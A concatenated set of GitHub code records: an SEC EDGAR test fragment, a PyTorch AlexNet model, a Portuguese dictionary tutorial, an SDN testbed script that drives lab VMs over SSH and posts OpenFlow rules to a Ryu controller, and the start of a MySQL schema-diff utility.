edgar.edgar_mode.max_connections == 10\n\n edgar.edgar_mode = CAUTION\n assert edgar.edgar_mode.max_connections == 5\n\n edgar.edgar_mode = CRAWL\n assert edgar.edgar_mode.max_connections == 2\n\n\ndef test_get_text_between_tags():\n text = get_text_between_tags(\n 'https://www.sec.gov/Archives/edgar/data/1009672/000156459018004771/0001564590-18-004771.txt',\n 'SEC-HEADER')\n print(text)\n assert 'ACCESSION NUMBER:\t\t0001564590-18-004771' in text\n","repo_name":"dgunning/edgartools","sub_path":"tests/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"66"} +{"seq_id":"44418341545","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass AlexNet(nn.Module):\n def __init__(self, num_classes=10):\n super().__init__()\n self.name = 'alexnet'\n self.conv1 = nn.Conv2d(3,96,kernel_size=(11,11),stride=4,padding=2)\n self.pool = nn.MaxPool2d((3,3),stride=2)\n self.conv2 = nn.Conv2d(96,256,kernel_size=(5,5),stride=1,padding=2)\n self.conv3 = nn.Conv2d(256,384,kernel_size=(3,3),stride=1,padding=1)\n self.conv4 = nn.Conv2d(384,384,kernel_size=(3,3),stride=1,padding=1)\n self.conv5 = nn.Conv2d(384,256,kernel_size=(3,3),stride=1,padding=1)\n self.fc1 = nn.Linear(6*6*256,4096)\n self.fc2 = nn.Linear(4096,4096)\n self.fc3 = nn.Linear(4096,num_classes)\n \n\n def forward(self,x):\n x = F.relu(self.conv1(x))\n x = self.pool(x)\n x = F.relu(self.conv2(x))\n x = self.pool(x)\n x = F.relu(self.conv3(x))\n x = F.relu(self.conv4(x))\n x = F.relu(self.conv5(x))\n x = self.pool(x)\n x = x.view(-1, 256 * 6 * 6)\n x = F.relu(self.fc1(x))\n x = F.dropout(x, p=0.5, training=self.training)\n x = F.relu(self.fc2(x))\n x = F.dropout(x, p=0.5, training=self.training)\n x = self.fc3(x)\n return x\n\nif __name__ == '__main__':\n net = AlexNet()\n 
print(net)\n","repo_name":"tony-ch/pytorch_practice","sub_path":"net/alexnet.py","file_name":"alexnet.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32273478499","text":"\"\"\"\nDicionario em python\nlista que possui chave valor\n\"\"\"\n\n# d1 = {'chave1':'valor da chave'}\n# d1 = dict(chave1='valor da chave', chave2='valor da outra chave')\n# d1['nova_chave'] = 'valor da chave'\n# d1 = {\n# 'str': 'valor',\n# \"123\": 'Outro valor',\n# \"chave3\": 'Tupla'\n# }\n\n# d1.update({'str': 'nova_valor'})\n# d1.pop('chave3')\n# del d1['str']\n#\n# print(123 in d1.keys())\n# print('Tupla' in d1.values())\n#\n# print(len(d1))\n\n# if d1.get('nomedachave') is not None:\n# print(d1.get('nomedachave'))\n\ncliente = {\n 'cliente1': {\n 'nome': 'Luiz',\n 'sobrenome': 'Otavio'\n },\n 'cliente2': {\n 'nome': 'Kaique',\n 'sobrenome': 'Gomes'\n }\n}\n\nfor clientes_k, clientes_v in cliente.items():\n print(f'Exibindo {clientes_k}')\n for dados_k, dados_v in clientes_v.items():\n print(f'\\t{dados_k} = {dados_v}')\n\nimport copy\n\nc = copy.deepcopy(cliente)\n","repo_name":"kaiqkt/learning-python","sub_path":"procedural-programming/aula7.py","file_name":"aula7.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8101926672","text":"'''\nScript to connect to the virtual machines through the gateways node1 and node2\njumpssh: blocking\nhttps://pypi.org/project/jumpssh/\n\nfabric: non blocking implementation with threads. Did not work.\nhttps://www.fabfile.org/index.html\n\nparallel ssh: non blocking\n\nWilliam Orozco\nworozco at ucdavis dot edu\nDecember 2021\n'''\n\n\n'''\n====================================\nimport libraries\n====================================\n'''\nimport json\nimport multiprocessing\nimport threading\nimport requests\nimport socket\nfrom fabric import Connection # this library uses threading\nfrom jumpssh import SSHSession # this library is blocking\nfrom pssh.config import HostConfig #This library worked.\nfrom pssh.clients import ParallelSSHClient\nimport pssh.clients\nimport datetime\n\n'''\n====================================\nDEFINITIONS\n====================================\n'''\n\n'''\ndefine gateways and vms in the json file\ngateways: {ID: [IP, username, password]}\nvms: {ID: [IP, username, password, Gateway ID]} where gw id is the host server ID for the VM\n\n'''\nIPERF_TIME = 60 # duration of the experiment, in seconds\nRECONFIGURATION_1=20\nRECONFIGURATION_2=40\nBW_IPERF = '5g' # bandwidth for the experiment\n\ncredentials = json.load(open('credentials.json'))\n\n# define the URL of the sdn controller app ofctl_rest\nOFCTL_REST_IP = credentials['ip']\nADD_FLOW_URI = credentials['add_flow']\nCLEAR_FLOWS_URI = credentials['clear_flow']\nDELETE_FLOWS_URI = credentials['delete_flow']\n\n# datapath ID of virtual bridges in pica8 switch\nDPID_BR1 = int(credentials['dpid'][0])\nDPID_BR2 = int(credentials['dpid'][1])\nDPID_BR3 = int(credentials['dpid'][2])\nDPID_BR4 = int(credentials['dpid'][3])\n\n# define the gateway and vm credentials for ssh\ngateway_credentials = credentials['gateway_credentials']\nvm_credentials = credentials['vm_credentials']\n\n# tcpdump directory\n#TCP_TEST_DIRECTORY = credentials['tcpdump_file_datapath'],\nTCP_TEST_DIRECTORY = \"Desktop/pcap_files/\"\n'''\n====================================\nSection 1: SSH connection to the virtual 
machines.\n====================================\n'''\n\n'''\nThis method will connect to the gateways and to the virtual machines through the gateways. \n Gateway: host server\n virtual machine: hosted in the gateway\n\n This script is running on monitor1 server\n Current topology: \n |----vm1\n |---- node1 |\n | |----vm2\n monitor1 -------switch1\n | |----vm3\n |---- node2 |\n |----vm4\n'''\n\n\n# Method using jumpssh\ndef connect_to_vms_jumpssh(gateway_credentials=gateway_credentials, vm_credentials=vm_credentials):\n gateway_session = {}\n vm_session = {}\n # 1. Create the ssh connection to the gateways (host servers)\n for i, val in enumerate(gateway_credentials.keys()):\n try:\n gateway_session[val] = SSHSession(host=gateway_credentials[val][0],\n username=gateway_credentials[val][1],\n password=gateway_credentials[val][2]).open()\n\n except:\n print('Could not connect to host server: ' + gateway_credentials[val][0])\n print('connected to host servers')\n # 2. Create the ssh connection to the virtual machines (guest servers)\n for i, val in enumerate(vm_credentials.keys()):\n try:\n # vm_credentials[val][3] has the host server ID, the key in the gateway sessions dict.\n vm_session[val] = gateway_session[str(vm_credentials[val][3])].get_remote_session(\n host=vm_credentials[val][0],\n username=vm_credentials[val][1],\n password=vm_credentials[val][2])\n except:\n print('Could not connect to guest vm: ' + vm_credentials[val][0])\n print('connected to guest vms')\n return gateway_session, vm_session\n\n# https://stackoverflow.com/questions/51237956/python-how-do-i-authenticate-ssh-connection-with-fabric-module\n# Method using fabric\ndef connect_to_vms_fabric(gateway_credentials=gateway_credentials, vm_credentials=vm_credentials):\n gateway_session = {}\n vm_session = {}\n # 1. Create the ssh connection to the gateways (host servers)\n for i, val in enumerate(gateway_credentials.keys()):\n try:\n gateway_session[val] = Connection(host=gateway_credentials[val][0],\n user=gateway_credentials[val][1],\n connect_kwargs={'password': gateway_credentials[val][2]})\n except:\n print('Could not connect to host server: ' + gateway_credentials[val][0])\n print('connected to host servers')\n # 2. Create the ssh connection to the virtual machines (guest servers)\n for i, val in enumerate(vm_credentials.keys()):\n try:\n # vm_credentials[val][3] has the host server ID, the key in the gateway sessions dict.\n vm_session[val] = Connection(\n host=vm_credentials[val][0],\n user=vm_credentials[val][1],\n connect_kwargs={'password': vm_credentials[val][2]},\n gateway=gateway_session[str(vm_credentials[val][3])])\n except:\n print('Could not connect to guest vm: ' + vm_credentials[val][0])\n print('connected to guest vms')\n return gateway_session, vm_session\n\n# Method using parallel ssh\ndef connect_to_vms_pssh(gateway_credentials=gateway_credentials, vm_credentials=vm_credentials):\n gateway_session = {}\n vm_session = {}\n # 1. Create the ssh connection to the gateways (host servers)\n for i, val in enumerate(gateway_credentials.keys()):\n try:\n gateway_session[val] = \\\n pssh.clients.ParallelSSHClient(\n hosts=[gateway_credentials[val][0]],\n host_config=[HostConfig(user=gateway_credentials[val][1],\n password=gateway_credentials[val][2])])\n\n except:\n print('Could not connect to host server: ' + gateway_credentials[val][0])\n print('connected to host servers')\n # 2. 
Create the ssh connection to the virtual machines (guest servers)\n for i, val in enumerate(vm_credentials.keys()):\n try:\n # vm_credentials[val][3] has the host server ID, the key in the gateway sessions dict.\n vm_session[val] = pssh.clients.ParallelSSHClient(\n hosts=[vm_credentials[val][0]],\n host_config=[HostConfig(user=vm_credentials[val][1],\n password=vm_credentials[val][2],\n proxy_host=gateway_credentials[str(vm_credentials[val][3])][0],\n proxy_user=gateway_credentials[str(vm_credentials[val][3])][1],\n proxy_password=gateway_credentials[str(vm_credentials[val][3])][2])]\n )\n except:\n print('Could not connect to guest vm: ' + vm_credentials[val][0])\n print('connected to guest vms')\n print('---done---')\n return gateway_session, vm_session\n\n\n# run iperf client\ndef iperf_c(vm, t=IPERF_TIME, b='', ip_s='10.0.0.4'):\n #output = vm.run_command('hostname')\n print('running iperf client')\n #for line in output[0].stdout:\n # print(line)\n cmd = 'iperf3 -c ' + ip_s + ' -t ' + str(t)\n if b != '':\n cmd += ' -b ' + str(b)\n vm.run_command(cmd)\n print('---done---')\n return None\n\n\n# run iperf server\ndef iperf_s(vm):\n #output = vm.run_command('hostname')\n print('running iperf server')\n #for line in output[0].stdout:\n # print(line)\n vm.run_command('iperf3 -s -1')\n print('---done---')\n return None\n\n# run hostname server\ndef hostname(vm):\n output = vm.run_command('hostname')\n print('running hostname on: ')\n for line in output[0].stdout:\n print(line)\n print('---done---')\n return None\n\n# run tcpdump\n# https://parallel-ssh.readthedocs.io/en/latest/advanced.html?highlight=sudo#run-with-sudo\ndef tcpdump_vm(vm, endpoints,\n sudo_password=vm_credentials['1'][2],\n test_type='single',\n directory=TCP_TEST_DIRECTORY,\n t=IPERF_TIME+3,\n bw=BW_IPERF,\n vm_nic='enp2s0',\n capture_size=96):\n #output = vm.run_command('hostname')\n print('running tcpdump')\n #for line in output[0].stdout:\n # print(line)\n # filename structure: 'bandwidth)endpoints)test_type)mm_dd_yyyy-hh-mm-ss.pcap'\n # https://www.programiz.com/python-programming/datetime/strftime\n\n filename = bw + \")\"+endpoints + \")\" + test_type + \")\"+datetime.datetime.now().strftime(\"%m_%d_%Y-%H_%M_%S\")+'.pcap'\n command='timeout ' + str(t)\n command+= ' tcpdump -i ' + vm_nic\n command+= ' -s '+ str(capture_size)\n command+= ' -w ' + directory\n command+= filename\n print(command)\n #out = vm.run_command(command)\n vm.run_command(command)\n print('---done---')\n return None\n\n'''\n===========================================\nSection 2: HTTP requests to the OFCTL_REST.py app of the Ryu controller \non controller1 server\n===========================================\n'''\n# this method helps to create the payload required to add a flow.\ndef ofctl_flow_payload(dpid, action,\n in_port, out_port,\n ip_src, ip_dst, priority=10):\n if action == 'ADD':\n type_str_begin = '\"instructions\": [{\"type\": \"APPLY_ACTIONS\",'\n type_str_end = '}] '\n output_match = ''\n elif action == 'DELETE':\n type_str_begin = ''\n type_str_end = ''\n output_match = '\"out_port\": ' + str(out_port) + ',' # this field is not a valid match field, so should remove.\n\n payload = '{\"dpid\":' + str(dpid) + ',\\\n \"table_id\": 0,\\\n \"priority\": ' + str(priority) + ',\\\n \"match\":{\\\n \"in_port\":' + str(in_port) + ',' \\\n + output_match + \\\n '\"dl_type\":0x0800,\\\n \"nw_src\":\"' + ip_src + '\",\\\n \"nw_dst\":\"' + ip_dst + '\" \\\n },' + type_str_begin + '\\\n \"actions\": [\\\n {\\\n \"port\": ' + str(out_port) + ',\\\n 
\"type\": \"OUTPUT\"\\\n }\\\n ]' \\\n + type_str_end + \\\n '}'\n\n # r = requests.post(url=OFCTL_REST_IP+ADD_FLOW_URI, data=payload)\n return payload\n\n\n# TEMPORARY METHOD TO ADD THE FLOWS FOR VM1 TO VM4 through TRUNK1 (higher priority) and TRUNK2 (lower priority),\ndef add_flows_vm1_vm4():\n # Add flows for bridge 0:\n # Trunk1:\n flow1_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=1, out_port=5, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=10)\n flow2_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=5, out_port=1, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=10)\n # Trunk2:\n flow3_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=1, out_port=7, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=5)\n flow4_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=7, out_port=1, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=5)\n\n # Add flows for bridge 1:\n # Trunk1:\n flow5_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=6, out_port=4, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=10)\n flow6_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=4, out_port=6, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=10)\n # Trunk2:\n flow7_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=8, out_port=4, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=5)\n flow8_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=4, out_port=8, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=5)\n # Now add all the flows\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow1_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow2_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow3_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow4_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow5_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow6_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow7_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow8_payload)\n print('adding flows')\n return None\n\n# TEMPORARY METHOD TO ADD THE FLOWS FOR VM1 TO VM4 through TRUNK1 (higher priority) and TRUNK2 (lower priority),\ndef add_flows_vm1_vm4_v2():\n # Trunk1:\n add_flows_trunk1(priority=10)\n add_flows_trunk1(priority=5)\n # Trunk2:\n add_flows_trunk2(priority=7)\n print('adding flows v2')\n return 0\n\n# delete flows that match certain conditions.\n\n# clear flows per bridge\ndef del_all_flows(dpid):\n r = requests.delete(url=OFCTL_REST_IP + CLEAR_FLOWS_URI + str(dpid))\n return None\n\n# TEMPORARY METHOD TO DELETE THE FLOWS FOR VM1 TO VM4 BETWEEN TRUNK1\n# must use delete_strict URI to consider deleting flows matching priority.\ndef del_flows_trunk1(priority=10):\n flow1_payload = ofctl_flow_payload(dpid=DPID_BR1, in_port=1, out_port=5, ip_src='10.0.0.1', ip_dst='10.0.0.4',\n action='DELETE', priority=priority)\n flow2_payload = ofctl_flow_payload(dpid=DPID_BR1, in_port=5, out_port=1, ip_src='10.0.0.4', ip_dst='10.0.0.1',\n action='DELETE', priority=priority)\n flow3_payload = ofctl_flow_payload(dpid=DPID_BR4, in_port=6, out_port=4, ip_src='10.0.0.1', ip_dst='10.0.0.4',\n action='DELETE', priority=priority)\n flow4_payload = ofctl_flow_payload(dpid=DPID_BR4, in_port=4, out_port=6, ip_src='10.0.0.4', ip_dst='10.0.0.1',\n action='DELETE', priority=priority)\n\n r = requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow1_payload)\n r = 
requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow2_payload)\n r = requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow3_payload)\n r = requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow4_payload)\n print('removing flows trunk1 with priority ' + str(priority))\n return\n\n\n# TEMPORARY METHOD TO DELETE THE FLOWS FOR VM1 TO VM4 BETWEEN TRUNK2\n# must use delete_strict URI to consider deleting flows matching priority.\ndef del_flows_trunk2(priority=7):\n flow1_payload = ofctl_flow_payload(dpid=DPID_BR1, in_port=1, out_port=7, ip_src='10.0.0.1', ip_dst='10.0.0.4',\n action='DELETE', priority=priority)\n flow2_payload = ofctl_flow_payload(dpid=DPID_BR1, in_port=7, out_port=1, ip_src='10.0.0.4', ip_dst='10.0.0.1',\n action='DELETE', priority=priority)\n flow3_payload = ofctl_flow_payload(dpid=DPID_BR4, in_port=8, out_port=4, ip_src='10.0.0.1', ip_dst='10.0.0.4',\n action='DELETE', priority=priority)\n flow4_payload = ofctl_flow_payload(dpid=DPID_BR4, in_port=4, out_port=8, ip_src='10.0.0.4', ip_dst='10.0.0.1',\n action='DELETE', priority=priority)\n\n r = requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow1_payload)\n r = requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow2_payload)\n r = requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow3_payload)\n r = requests.post(url=OFCTL_REST_IP + DELETE_FLOWS_URI, data=flow4_payload)\n print('removing flows trunk2 with priority ' + str(priority))\n return\n\n# TEMPORARY METHOD TO ADD THE FLOWS FOR VM1 TO VM4 BETWEEN TRUNK1 ONLY\n# must use delete_strict URI to consider deleting flows matching priority.\ndef add_flows_trunk1(priority=3):\n # Add flows for bridge 0:\n # Trunk1:\n flow1_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=1, out_port=5, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=priority)\n flow2_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=5, out_port=1, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=priority)\n\n # Add flows for bridge 1:\n # Trunk1:\n flow5_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=6, out_port=4, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=priority)\n flow6_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=4, out_port=6, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=priority)\n\n # Now add all the flows\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow1_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow2_payload)\n\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow5_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow6_payload)\n\n print('adding flows')\n return None\n\ndef add_flows_trunk2(priority=5):\n # Add flows for bridge 0:\n # Trunk1:\n flow1_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=1, out_port=7, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=priority)\n flow2_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR1, in_port=7, out_port=1, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=priority)\n\n # Add flows for bridge 1:\n # Trunk1:\n flow5_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=8, out_port=4, ip_src='10.0.0.1',\n ip_dst='10.0.0.4', priority=priority)\n flow6_payload = ofctl_flow_payload(action='ADD', dpid=DPID_BR4, in_port=4, out_port=8, ip_src='10.0.0.4',\n ip_dst='10.0.0.1', priority=priority)\n\n # Now add all the flows\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow1_payload)\n r = requests.post(url=OFCTL_REST_IP + 
ADD_FLOW_URI, data=flow2_payload)\n\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow5_payload)\n r = requests.post(url=OFCTL_REST_IP + ADD_FLOW_URI, data=flow6_payload)\n\n print('adding flows trunk 2 with priority ' + str(priority))\n return None\n\ndef edit_bidirectional_flows(dpid,in_port,out_port,ip_src,ip_dst,action='ADD',priority=1):\n forward_flow_payload = ofctl_flow_payload(action=action, dpid=dpid,\n in_port=in_port, out_port=out_port,\n ip_src=ip_src,ip_dst=ip_dst, priority=priority)\n\n reverse_flow_payload = ofctl_flow_payload(action=action, dpid=dpid,\n in_port=out_port, out_port=in_port,\n ip_src=ip_dst, ip_dst=ip_src, priority=priority)\n\n # Now add all the flows\n if action == 'ADD':\n URI = ADD_FLOW_URI\n else:\n URI = DELETE_FLOWS_URI\n r = requests.post(url=OFCTL_REST_IP + URI, data=forward_flow_payload)\n r = requests.post(url=OFCTL_REST_IP + URI, data=reverse_flow_payload)\n print(str(action)+' flows on bridge '+str(dpid) + \" for ips@ports \"\n + str(ip_src)+'@'+ str(in_port) + ', '\n + str(ip_dst)+'@'+ str(out_port)\n + ' with priority ' + str(priority))\n return None\n\ndef edit_flows_vm1_vm4_short_path(action='ADD',priority=9):\n # edit flows for bridge 1:\n edit_bidirectional_flows(action=action, dpid=DPID_BR1, in_port=1, out_port=5,\n ip_src='10.0.0.1', ip_dst='10.0.0.4', priority=priority)\n # edit flows for bridge 4:\n edit_bidirectional_flows(action=action, dpid=DPID_BR4, in_port=6, out_port=4,\n ip_src='10.0.0.1', ip_dst='10.0.0.4', priority=priority)\n return None\n\ndef edit_flows_vm2_vm3_long_path(action='ADD',priority=8):\n # edit flows for bridge 2:\n edit_bidirectional_flows(action=action, dpid=DPID_BR2, in_port=2, out_port=22,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n # edit flows for bridge 3:\n edit_bidirectional_flows(action=action, dpid=DPID_BR3, in_port=23, out_port=3,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n # edit flows for bridge 1:\n edit_bidirectional_flows(action=action, dpid=DPID_BR1, in_port=21, out_port=5,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n # edit flows for bridge 4:\n edit_bidirectional_flows(action=action, dpid=DPID_BR4, in_port=6, out_port=24,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n\n return None\n\ndef edit_flows_vm2_vm3_long_path_backup(action='ADD',priority=10):\n # edit flows for bridge 2:\n edit_bidirectional_flows(action=action, dpid=DPID_BR2, in_port=2, out_port=10,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n # edit flows for bridge 3:\n edit_bidirectional_flows(action=action, dpid=DPID_BR3, in_port=12, out_port=3,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n # edit flows for bridge 1:\n edit_bidirectional_flows(action=action, dpid=DPID_BR1, in_port=9, out_port=5,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n # edit flows for bridge 4:\n edit_bidirectional_flows(action=action, dpid=DPID_BR4, in_port=6, out_port=11,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n return None\n\ndef edit_flows_vm2_vm3_short_path(action='ADD', priority=6):\n # Add flows for bridge 2:\n edit_bidirectional_flows(action=action, dpid=DPID_BR2, in_port=2, out_port=7,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n # Add flows for bridge 3:\n edit_bidirectional_flows(action=action, dpid=DPID_BR3, in_port=8, out_port=3,\n ip_src='10.0.0.2', ip_dst='10.0.0.3', priority=priority)\n return None\n\n'''\n**********************************************\nMethods for opening a TCP socket 
and send commands to the optical switch. \nProtocol: SCPI\n**********************************************\n'''\n\n#Open TCP socket\ndef ots_connect_tcp_socket(ip, port):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((ip, port))\n return s\n\n#https://stackoverflow.com/questions/63214198/when-creating-bytes-with-b-prefix-before-string-what-encoding-does-python-use\ndef ots_connect_port(s, port_in, port_out):\n port_in_str = ','.join(str(i) for i in port_in)\n port_out_str = ','.join(str(i) for i in port_out)\n cmd = ':oxc:swit:conn:only (@{0}),(@{1}); stat?\\r\\n'.format(port_in_str, port_out_str)\n cmd = bytes(cmd, 'utf-8')\n s.sendall(cmd)\n #reply = s.recv(4096) #Reading from recv adds to the total execution time\n #return reply\n return None\n\ndef ots_disconnect_all(s):\n cmd=b':oxc:swit:disc:all\\r\\n'\n s.sendall(cmd)\n return None\n\n","repo_name":"sansastra/ngncs_hpc","sub_path":"ssh_flow_management.py","file_name":"ssh_flow_management.py","file_ext":"py","file_size_in_byte":23665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70447350291","text":"import re\n\n\n# 字段对象\nclass KeyObj():\n sql_str = \"\" # 原sql\n key_name = \"\" # 字段名\n type = \"\" # 类型\n len = \"\" # 长度\n not_null = \"\" # 是否null\n default = \"\" # 默认值\n comment = \"\" # 注释\n unsigned = \"\" # 是否无符号\n\n# 索引对象\nclass IndexObj():\n sql_str = \"\" # 原sql\n name = \"\" # 索引名\n field = [] # 索引字段\n\n# 表对象\nclass TableObj():\n sql_str = \"\" # 原sql\n table_name = \"\" # 表名\n key_map = {} # key:字段\n ordinary_key = {} # 普通键\n primary_key = None# 主键\n unique_key = {} # 联合键\n param = \"\" # 表参数\n \n def __init__(self):\n self.key_map = {}\n self.ordinary_key = {}\n self.primary_key = None\n self.unique_key = {}\n \n\n# 解析sql文件\ndef analysis_sql_file(path):\n with open(path, 'r', encoding = 'utf8') as f:\n sql_str = f.readlines()\n sql_str = \"\".join(sql_str)\n return analysis_sql_str(sql_str)\n\n# 解析sql str\ndef analysis_sql_str(sql_str):\n # 切割每一个表\n table_map = {}\n table_arr = sql_str.split(\"CREATE TABLE\")\n for tmp_table_str in table_arr:\n # 填过空白行\n if tmp_table_str.isspace() or tmp_table_str == \"\":\n continue\n # 保持完整性\n table_obj = str_to_table_obj(\"CREATE TABLE\" + tmp_table_str)\n table_map[table_obj.table_name] = table_obj\n return table_map\n\n# 解析数据库表结构\ndef analysis_db_table(cursor, db_name):\n # 不存在就创建库\n cursor.execute(\"create database if not exists %s\"%(db_name))\n cursor.execute(\"use %s\"%(db_name))\n # 获取表名\n # sql = \"select table_name from information_schema.tables where table_schema='%s' and table_type='base table';\\n\"%(db_name)\n sql = \"show tables;\"\n cursor.execute(sql)\n # 读取表名\n table_name_list = []\n results = cursor.fetchall()\n for row in results:\n table_name_list.append(row[0])\n \n # 获取创表sql\n sql_str = \"\"\n # print(\"analysis_db_table db_name:%s table_name_list:%s\"%(db_name, table_name_list))\n for table_name in table_name_list:\n cursor.execute(\"show create table %s\"%(table_name))\n # results = cursor.fetchall()\n one_results = cursor.fetchone()\n sql_str += (one_results[1] + \";\\n\")\n \n return analysis_sql_str(sql_str)\n\n# 创建差异变化sql\ndef create_diff_sql(table_map, db_table_map):\n # 新加的表\n add_table_sql = \"\"\n for table_name in table_map:\n if table_name not in db_table_map:\n print(\"table_map %s\"%(table_map.keys()))\n print(\"db_table_map %s\"%(db_table_map.keys()))\n add_table_sql += table_map[table_name].sql_str\n \n # 删除的表\n delete_table_sql = \"\"\n for table_name in 
db_table_map:\n if table_name not in table_map:\n delete_table_sql += \"DROP TABLE %s;\\n\"%(table_name)\n \n # 对比已存在的表差异\n modify_table_sql = \"\"\n for table_name in table_map:\n if table_name in db_table_map:\n diff_sql_str = table_diff(table_map[table_name], db_table_map[table_name])\n modify_table_sql += diff_sql_str\n return add_table_sql + delete_table_sql + modify_table_sql\n \n\n\n# str转TableObj\ndef str_to_table_obj(sql_str):\n table_obj = TableObj()\n table_obj.sql_str = sql_str\n # 获取表名\n sql_str = get_table_name(table_obj, sql_str)\n # 获取字段\n sql_str = get_table_val(table_obj, sql_str)\n # 获取键\n get_table_key(table_obj, sql_str)\n return table_obj\n\n# 获取表名\ndef get_table_name(table_obj:TableObj, sql_str:str):\n # print(\"sql_str:%s\\n\"%(sql_str))\n # 表名\n table_obj.table_name,sql_str = get_str_by_begin_end(sql_str, \"`\", \"`\")\n # 表字段\n field_str,sql_str = get_str_by_begin_end(sql_str, \"(\", \"\\n)\")\n # 表参数\n param_end = sql_str.find(\";)\")\n table_obj.param = sql_str[: param_end]\n # print(\"table_obj.table_name:%s\\n\"%(table_obj.table_name))\n # print(\"table_obj.param:%s\\n\"%(table_obj.param))\n # print(\"field_str:%s\\n\"%(field_str))\n return field_str\n \n # re实现\n # matchObj = re.match( r\".*?`(.*?)`.*?\\((.*)\\) (.*);.*\", sql_str, re.M|re.S)\n # # 表名\n # table_obj.table_name = matchObj.group(1)\n # sql_str = matchObj.group(2)\n # # 表参数\n # table_obj.param = matchObj.group(3)\n # return sql_str\n\n# 获取字段\ndef get_table_val(table_obj:TableObj, sql_str:str):\n while True :\n sql_str = sql_str.lstrip()\n # 是否还是字段行\n if sql_str.find(\"`\") != 0:\n break\n \n # find实现\n # 字段str范围\n key_str_end = sql_str.find(\"\\n\")\n key_str = sql_str[:key_str_end]\n sql_str = sql_str[key_str_end:]\n # 获取key\n key_obj = KeyObj()\n key_obj.sql_str = key_str\n key_obj.key_name,key_str = get_str_by_begin_end(key_str, \"`\", \"`\")\n # 获取注释\n key_obj.comment,_tmp = get_str_by_begin_end(key_str, \"COMMENT '\", \"'\")\n # 获取默认值\n key_obj.default,_tmp = get_str_by_begin_end(key_str, \"DEFAULT '\", \"'\")\n # 是否无符号\n if key_str.find(\"unsigned\") != -1:\n key_obj.unsigned = \"unsigned\"\n # 获取是否不为空\n if key_str.find(\"NOT NULL\") != -1:\n key_obj.not_null = \"NOT NULL\"\n # 获取类型和长度\n key_str = key_str.lstrip()\n matchObj = re.match( r\".*? (.*?)\\((.*?)\\).*\", 